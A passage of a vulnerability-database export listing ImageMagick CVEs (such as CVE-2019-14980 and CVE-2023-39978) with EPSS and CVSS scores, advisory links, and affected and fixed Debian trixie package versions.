value	0.00327
scoring_system	epss
scoring_elements	0.55696
published_at	2026-04-21T12:55:00Z

value	0.00327
scoring_system	epss
scoring_elements	0.55621
published_at	2026-04-24T12:55:00Z

value	0.00327
scoring_system	epss
scoring_elements	0.55638
published_at	2026-04-26T12:55:00Z

url

https://api.first.org/data/v1/epss?cve=CVE-2020-25663

reference_url	https://bugzilla.redhat.com/show_bug.cgi?id=1891601
reference_id	1891601
reference_type
scores
url	https://bugzilla.redhat.com/show_bug.cgi?id=1891601

fixed_packages

url	pkg:deb/debian/imagemagick@0?distro=trixie
purl	pkg:deb/debian/imagemagick@0?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@0%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eb4u-x1mt-2uan

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.1.43%252Bdfsg1-1%252Bdeb13u5%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.16%252Bdfsg1-1%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.18%252Bdfsg1-1%3Fdistro=trixie

url	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
purl	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.19%252Bdfsg1-1%3Fdistro=trixie

aliases CVE-2020-25663

risk_score null

exploitability null

weighted_severity null

resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-p31j-f9s2-quh9

url VCID-pp81-c241-rbb5

vulnerability_id VCID-pp81-c241-rbb5

summary ImageMagick: use-after-free in magick/blob.c resulting in a denial of service

references

reference_url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-14980.json

reference_id

reference_type

scores

value	5.9
scoring_system	cvssv3
scoring_elements	CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-14980.json

reference_url

https://api.first.org/data/v1/epss?cve=CVE-2019-14980

reference_id

reference_type

scores

value	0.00197
scoring_system	epss
scoring_elements	0.41581
published_at	2026-04-01T12:55:00Z

value	0.00197
scoring_system	epss
scoring_elements	0.41669
published_at	2026-04-02T12:55:00Z

value	0.00197
scoring_system	epss
scoring_elements	0.41696
published_at	2026-04-04T12:55:00Z

value	0.00197
scoring_system	epss
scoring_elements	0.41624
published_at	2026-04-07T12:55:00Z

value	0.00197
scoring_system	epss
scoring_elements	0.41674
published_at	2026-04-08T12:55:00Z

value	0.00197
scoring_system	epss
scoring_elements	0.41682
published_at	2026-04-09T12:55:00Z

value	0.00197
scoring_system	epss
scoring_elements	0.41705
published_at	2026-04-16T12:55:00Z

value	0.00197
scoring_system	epss
scoring_elements	0.41672
published_at	2026-04-12T12:55:00Z

value	0.00197
scoring_system	epss
scoring_elements	0.41658
published_at	2026-04-13T12:55:00Z

value	0.00197
scoring_system	epss
scoring_elements	0.41679
published_at	2026-04-18T12:55:00Z

value	0.00197
scoring_system	epss
scoring_elements	0.41605
published_at	2026-04-21T12:55:00Z

value	0.00197
scoring_system	epss
scoring_elements	0.41497
published_at	2026-04-24T12:55:00Z

value	0.00197
scoring_system	epss
scoring_elements	0.41494
published_at	2026-04-26T12:55:00Z

url

https://api.first.org/data/v1/epss?cve=CVE-2019-14980

reference_url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_id

reference_type

scores

value	3.3
scoring_system	cvssv3
scoring_elements	CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L

url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_url	https://bugzilla.redhat.com/show_bug.cgi?id=1757779
reference_id	1757779
reference_type
scores
url	https://bugzilla.redhat.com/show_bug.cgi?id=1757779

reference_url	https://access.redhat.com/errata/RHSA-2020:1180
reference_id	RHSA-2020:1180
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2020:1180

fixed_packages

url	pkg:deb/debian/imagemagick@0?distro=trixie
purl	pkg:deb/debian/imagemagick@0?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@0%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eb4u-x1mt-2uan

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.1.43%252Bdfsg1-1%252Bdeb13u5%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.16%252Bdfsg1-1%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.18%252Bdfsg1-1%3Fdistro=trixie

url	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
purl	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.19%252Bdfsg1-1%3Fdistro=trixie

aliases CVE-2019-14980

risk_score 2.6

exploitability 0.5

weighted_severity 5.3

resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-pp81-c241-rbb5

url VCID-q37s-1azj-xkhv

vulnerability_id VCID-q37s-1azj-xkhv

summary ImageMagick: Memory leak in Magick::Draw

references

reference_url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2023-39978.json

reference_id

reference_type

scores

value	3.3
scoring_system	cvssv3
scoring_elements	CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L

url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2023-39978.json

reference_url

https://api.first.org/data/v1/epss?cve=CVE-2023-39978

reference_id

reference_type

scores

value	0.00035
scoring_system	epss
scoring_elements	0.10171
published_at	2026-04-02T12:55:00Z

value	0.00035
scoring_system	epss
scoring_elements	0.1018
published_at	2026-04-26T12:55:00Z

value	0.00035
scoring_system	epss
scoring_elements	0.1024
published_at	2026-04-13T12:55:00Z

value	0.00035
scoring_system	epss
scoring_elements	0.10113
published_at	2026-04-16T12:55:00Z

value	0.00035
scoring_system	epss
scoring_elements	0.1009
published_at	2026-04-18T12:55:00Z

value	0.00035
scoring_system	epss
scoring_elements	0.10223
published_at	2026-04-21T12:55:00Z

value	0.00035
scoring_system	epss
scoring_elements	0.10203
published_at	2026-04-24T12:55:00Z

value	0.00035
scoring_system	epss
scoring_elements	0.10237
published_at	2026-04-04T12:55:00Z

value	0.00035
scoring_system	epss
scoring_elements	0.10133
published_at	2026-04-07T12:55:00Z

value	0.00035
scoring_system	epss
scoring_elements	0.10209
published_at	2026-04-08T12:55:00Z

value	0.00035
scoring_system	epss
scoring_elements	0.10269
published_at	2026-04-09T12:55:00Z

value	0.00035
scoring_system	epss
scoring_elements	0.10299
published_at	2026-04-11T12:55:00Z

value	0.00035
scoring_system	epss
scoring_elements	0.10259
published_at	2026-04-12T12:55:00Z

url

https://api.first.org/data/v1/epss?cve=CVE-2023-39978

reference_url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_id

reference_type

scores

value	3.3
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L

url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_url	https://bugzilla.redhat.com/show_bug.cgi?id=2230713
reference_id	2230713
reference_type
scores
url	https://bugzilla.redhat.com/show_bug.cgi?id=2230713

reference_url

https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/4UFQJCYJ23HWHNDOVKBHZQ7HCXXL6MM3/

reference_id

4UFQJCYJ23HWHNDOVKBHZQ7HCXXL6MM3

reference_type

scores

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2023-11-30T21:35:39Z/

url

https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/4UFQJCYJ23HWHNDOVKBHZQ7HCXXL6MM3/

reference_url

https://github.com/ImageMagick/ImageMagick6/compare/6.9.12-90...6.9.12-91

reference_id

6.9.12-90...6.9.12-91

reference_type

scores

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2023-11-30T21:35:39Z/

url

https://github.com/ImageMagick/ImageMagick6/compare/6.9.12-90...6.9.12-91

reference_url

https://github.com/ImageMagick/ImageMagick6/commit/c90e79b3b22fec309cab55af2ee606f71b027b12

reference_id

c90e79b3b22fec309cab55af2ee606f71b027b12

reference_type

scores

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2023-11-30T21:35:39Z/

url

https://github.com/ImageMagick/ImageMagick6/commit/c90e79b3b22fec309cab55af2ee606f71b027b12

reference_url

https://github.com/rmagick/rmagick/pull/1406/files

reference_id

files

reference_type

scores

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2023-11-30T21:35:39Z/

url

https://github.com/rmagick/rmagick/pull/1406/files

fixed_packages

url	pkg:deb/debian/imagemagick@0?distro=trixie
purl	pkg:deb/debian/imagemagick@0?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@0%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eb4u-x1mt-2uan

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.1.43%252Bdfsg1-1%252Bdeb13u5%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.16%252Bdfsg1-1%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.18%252Bdfsg1-1%3Fdistro=trixie

url	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
purl	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.19%252Bdfsg1-1%3Fdistro=trixie

aliases CVE-2023-39978

risk_score null

exploitability null

weighted_severity null

resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-q37s-1azj-xkhv

url VCID-qye1-pv1p-8fbp

vulnerability_id VCID-qye1-pv1p-8fbp

summary ImageMagick: Memory allocation failure in AcquireMagickMemory (incomplete fix for CVE-2016-8862)

references

reference_url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2016-8866.json

reference_id

reference_type

scores

value	3.3
scoring_system	cvssv3
scoring_elements	CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L

url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2016-8866.json

reference_url

https://api.first.org/data/v1/epss?cve=CVE-2016-8866

reference_id

reference_type

scores

value	0.00477
scoring_system	epss
scoring_elements	0.64815
published_at	2026-04-01T12:55:00Z

value	0.00477
scoring_system	epss
scoring_elements	0.64866
published_at	2026-04-02T12:55:00Z

value	0.00477
scoring_system	epss
scoring_elements	0.64893
published_at	2026-04-04T12:55:00Z

